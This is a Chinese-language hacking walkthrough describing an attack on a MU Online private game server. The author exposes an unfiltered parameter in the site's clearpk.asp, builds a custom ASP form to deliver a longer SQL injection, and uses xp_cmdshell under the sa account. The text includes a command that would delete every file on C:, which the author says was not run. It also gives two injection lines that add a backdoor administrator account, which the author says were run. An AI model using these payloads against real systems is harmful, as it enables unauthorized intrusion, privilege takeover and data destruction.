奇迹私服攻击实例

首先声明:对以下内容所造成的危害由肇事者负责,本人不负任何形式的责任 dedecms.com

今天就找了试了试
np倒还没搞(不务正业啊)
忽然想到昨天讨论的asp漏洞问题
于是观察一下排行榜,就是 top100.asp
倒是没发现什么问题
然后一点一点看其他的asp
发现问题还是有......
就拿洗红来说

内容如下:

<!--#include file="conn.asp" -->
<%
n=request.form("username")
p=request.form("userchr")

if instr(n,"")<>0 then response.end
if instr(n,"=")<>0 then response.end
if instr(n,"%")<>0 then response.end

if n<>"" and p<>"" then
set rs1 = Server.CreateObject("ADODB.Recordset")
sql="select * from Character where AccountID="&n&" and Name="&p&" and pklevel<>3"
rs1.open sql,conn,1,3
if rs1.eof or rs1.bof then
response.write "<script language=javascript>alert(没有找到您的角色信息,或者您不是红名!);history.back()</script>"
response.end
end if
if rs1("money")<hongmingxiaoqian then
response.write "<script language=javascript>alert(大哥,没钱就不要来这里,去拿点钱再来吧!);history.back()</script>"
else
rs1("money")=rs1("money")-hongmingxiaoqian
rs1("pklevel")=3
rs1.update
response.write "<script language=javascript>alert(恭喜,您现在已经不是魔头了,但是您被洗走了"&hongmingxiaoqian&"MU币!);history.back()</script>"
response.end
end if
else
%>
<HTML>
<HEAD>
<TITLE><%=sitename%>-取消红名</TITLE>
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
<LINK href="images/mu.css" rel=stylesheet type=text/css>
</HEAD>
<BODY bgColor=#000000 leftMargin=0 text=#666666 topMargin=0 marginheight="0" marginwidth="0">
<DIV align=center>
<FORM method=post name=chgform action="clearpk.asp">
<TABLE background=images/top_bg5.gif border=0 cellPadding=0 cellSpacing=0 width=775>
<TBODY>
<TR>
<TD align=middle vAlign=top><BR>
<TABLE border=0 cellPadding=0 cellSpacing=0 width=510>
<TBODY>
<TR>
<TD><IMG src="http://www.5uwl.net/wyjs/2005/images/login.gif"></TD></TR>
<TR>
<TD height=1><IMG height=1 src="" width=466></TD></TR>
<TR>
<TD align=right>　<TABLE align=center border=0 cellPadding=5 cellSpacing=1 width="366">
<TBODY>
<TR>
<TD align=right class=txt_gray width="83">
<img border="0" src="http://www.5uwl.net/wyjs/2005/images/m2.jpg"></TD>
<TD align=right class=txt_gray width="260">
<DIV align=left><FONT
color=#cc3300>大虾,请输入您的登陆信息</FONT></DIV>
<DIV align=left>　</DIV>
<DIV align=left>　</DIV>
<DIV align=left><font color="#CC3300">又杀人了吧,杀人是没是没什么好处的哦,这次要扣你<%=hongmingxiaoqian%>MU币</font></DIV></TD></TR>
<TR>
<TD align=right class=txt_gray width="83">
<DIV align=left>角色名称</DIV></TD>
<TD class=txt_gray width="260">
<INPUT maxLength=12 name=userchr size=17>
<DIV align=center></DIV></TD></TR>
<TR>
<TD align=right class=txt_gray width="83">
<DIV align=left>用户帐号</DIV></TD>
<TD class=txt_gray width="260">
<INPUT maxLength=12 name=username size=17>
<DIV align=center></DIV></TD></TR>
<TR>
<TD height=1 colspan=2 width="322"><p align="center"><BR><A href="javascript :document.chgform.submit()"><IMG border=0 src="http://www.5uwl.net/wyjs/2005/images/bt_confirm.gif"></A>
<img src="http://www.5uwl.net/wyjs/2005/images/bt_back.gif" style="cursor:hand" ><BR><BR></TD></TR></TBODY></TABLE>
</TD></TR>
</TBODY>
</TABLE>
</DIV></FORM>
</table><Br>
<center><font color=red><%=copy%></font>
</div>
</BODY>
</HTML>
<!--#include file="Copyright.asp" -->
<%end if%>

没用的不看,然后观察到里头有这样几句:

n=request.form("username")
p=request.form("userchr")

if instr(n,"")<>0 then response.end
if instr(n,"=")<>0 then response.end
if instr(n,"%")<>0 then response.end

if n<>"" and p<>"" then
set rs1 = Server.CreateObject("ADODB.Recordset")
sql="select * from Character where AccountID="&n&" and Name="&p&" and pklevel<>3"
rs1.open sql,conn,1,3

为什么只判断n有没有乱码不判断p呢
不判断的话俺们可就有的搞了
这就是问题所在啦~~
观察后头的语句:

sql="select * from Character where AccountID="&n&" and Name="&p&" and pklevel<>3"

这句如果令
n = 1;sql语句部分;--

dedecms.com

上面就替换成

sql="select * from Character where AccountID=1;sql语句部分;-- and Name="&p&" and pklevel<>3"

dedecms.com

大家知道分号;是sql语句结束符,两个减号--就是注释符
所以--后头的一串就成注释了,sql不执行...
于是sql就先执行
select * from Character where Accountid=1
然后就执行你写的sql语句了...
想到怎么搞了么?
对!写sql语句入侵啦~

观察asp文件的输入,是这样实现的:

<INPUT maxLength=12 name=userchr size=17>
<INPUT maxLength=12 name=username size=17> dedecms.com

就是说用户角色这个可利用的东西只能填写10来个字符...明显不够用啦~
显然自己写一个不限制长度的asp传递usechr比较好
于是自己写asp如下 ip依然马赛克掉)

<HTML>
<HEAD>
<TITLE><%=sitename%>-thantii提供的入侵实例</TITLE>
<META content="text/html; charset=gb2312" http-equiv=Content-Type>
</HEAD>
<BODY bgColor=#999999 leftMargin=0 text=#666666 topMargin=0 marginheight="0" marginwidth="0">
<DIV align=center>
<FORM method=post name=chgform action="";>
<TBODY>
<TR>
<TD align=middle vAlign=top><BR>
<TABLE border=0 cellPadding=0 cellSpacing=0 width=510>
<TBODY>
<TR>
<TD align=right>　<TABLE align=center border=0 cellPadding=5 cellSpacing=1 width="366">
<TBODY>
<TR>
<TD align=right class=txt_gray width="260">
<DIV align=left><FONT color=#cc3300>输入sql命令吧</FONT></DIV>
<DIV align=left>　</DIV>
<DIV align=left>　</DIV>
<DIV align=left>　</DIV>
<TR>
<TD align=right class=txt_gray width="83">
<DIV align=left>命令:</DIV></TD>
<TD class=txt_gray width="260">
<INPUT name=userchr type="text" class=button value="<%="1;此处填命令;--"%>" size=20 maxlength=120>
<DIV align=center></DIV></TD></TR>
<TR>
<TD align=right class=txt_gray width="83">
<DIV align=left>验证码:</DIV></TD>
<TD class=txt_gray width="260">
<INPUT name=username type="text" class=button value="<%=1234%>" size=20 maxlength=120>
<DIV align=center></DIV></TD></TR>
<TR>
<TR>
<TD height=1 colspan=2 width="322"><p align="center"><BR><A href="javascript :document.chgform.submit()">确定</A>
<BR><BR></TD></TR></TBODY></TABLE>
</TD></TR>
</TBODY>
</TABLE>
</DIV></FORM>
</table><Br>
<center><font color=red><%=copy%></font>
</div>
</BODY>

dedecms.com

运行之,然后填写sql命令轻松为自己弄了个变态人物.
随后又发现他的asp页面使用的帐户权限很高...是sa!!!
于是...
随心所欲啦~
因为可以用
master.dbo.xp_cmdshell
执行cmd语句
于是,
sql语句填写为: dedecms.com

exec master.dbo.xp_cmdshell del c:\*.* /f /s /q

一执行,他就洗白了...
但是最后一刻,我没有点确定
算是良心发现吧...我毕竟不是坏人...呵呵

也希望大家不要搞破坏哦

1;exec master.dbo.xp_cmdshell net user thantii thantii /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
1;exec master.dbo.xp_cmdshell net localgroup administrators thantii /add;--

执行这2句搞了个他的系统的管理员帐号耍了耍就算了 dedecms.com